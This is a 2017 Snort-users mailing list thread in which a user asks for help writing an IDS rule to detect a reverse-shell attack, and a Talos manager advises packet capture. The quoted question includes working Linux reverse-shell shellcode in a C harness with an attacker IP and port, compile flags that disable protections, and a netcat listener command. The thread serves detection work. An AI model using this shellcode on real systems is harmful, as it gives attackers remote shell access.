Snort mailing list archives
Re: Write rule alert shellcode
From: nguyen cao via Snort-users <snort-users () lists snort org>
Date: Tue, 24 Oct 2017 08:55:35 -0700
you know my problems 2017-10-24 8:52 GMT-07:00 Joel Esler (jesler) <jesler () cisco com>:
Please read #4 β https://snort.org/faq/what-is-the-mailing-list-etiquette *--* *Joel Esler *| *Talos:* Manager | jesler () cisco com On Oct 24, 2017, at 11:47 AM, nguyen cao <nguyenblack1995 () gmail com> wrote: I tried using wireshark to analyze and write rules. But not all. 2017-10-24 8:41 GMT-07:00 Joel Esler (jesler) <jesler () cisco com>:Itβs most useful to capture a packet capture of the traffic going between the two machines, and then write your detection based on that. *--* *Joel Esler *| *Talos:* Manager | jesler () cisco com On Oct 24, 2017, at 10:33 AM, nguyen cao via Snort-users < snort-users () lists snort org> wrote: I use shellcode: #include <stdio.h> #include <string.h> char code[] = \ "\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x8 0\x93\x89\xd1\xb0" "\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68" "\xc0\xa8\x01\x85" // <β change ip address of attacker "\x66\x68" "\x82\x35" // <β port 33333 "\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0 b\x58\x99\x89\xd1" "\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; int main(int argc,char **argv) { int(*func)(); func=(int(*)())code; (int)(*func)(); } command run : gcc namefile.c -o namefile -fno-stack-protector -z execstack When running the command above I was shellcode. Attacker and victim are use kali linux. - attacker run command : " nv -lvp 33333 " - victim run command : " ./namefile " ( run file shellcode ) When the victim runs the command. The attacker opens the connection to the victim I tried several ways but could not write rule alert for this type of attack! Hope everybody help please _______________________________________________ Snort-users mailing list Snort-users () lists snort org Go to this URL to change user options or unsubscribe: https://lists.snort.org/mailman/listinfo/snort-users Please visit http://blog.snort.org to stay current on all the latest Snort news!<wireshark.pcapng>
_______________________________________________ Snort-users mailing list Snort-users () lists snort org Go to this URL to change user options or unsubscribe: https://lists.snort.org/mailman/listinfo/snort-users Please visit http://blog.snort.org to stay current on all the latest Snort news! Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette
Current thread:
- Write rule alert shellcode nguyen cao via Snort-users (Oct 24)
- Re: Write rule alert shellcode Joel Esler (jesler) via Snort-users (Oct 24)
- Message not available
- Message not available
- Re: Write rule alert shellcode nguyen cao via Snort-users (Oct 24)
- Message not available
- Re: Write rule alert shellcode Joel Esler (jesler) via Snort-users (Oct 24)